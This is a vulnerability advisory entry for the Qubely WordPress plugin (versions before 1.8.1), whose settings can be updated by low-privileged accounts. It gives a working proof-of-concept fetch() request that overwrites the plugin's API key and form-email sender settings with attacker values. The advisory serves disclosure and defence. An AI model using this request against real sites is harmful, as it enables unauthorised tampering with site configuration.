WordPress Plugin Vulnerabilities
Qubely < 1.8.1 - Authenticated Arbitrary Settings Update
Description
The plugin does not have proper authorisation when saving its settings, allowing users with a role as low as subscriber (in versions < 1.7.9) or contributor (in v < 1.8.1) to update them
Proof of Concept
As a subscriber (Nonce can be taken from the qubely_local_script-js-extra script on the homepage) fetch("http://example.com/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": new URLSearchParams({"action": "update_qubely_options", "options[qubely_gmap_api_key]": "attacker-key", "options[form_from_name]": "Attacker", "options[form_from_email]": "attacker@domain.com", "_wpnonce": "602dfb5e65"}), "method": "POST", "credentials": "include" });
Affects Plugins
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Jan w Oleju
Submitter
Jan w Oleju
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-06-06 (about 1 years ago)
Added
2022-06-06 (about 1 years ago)
Last Updated
2022-06-14 (about 1 years ago)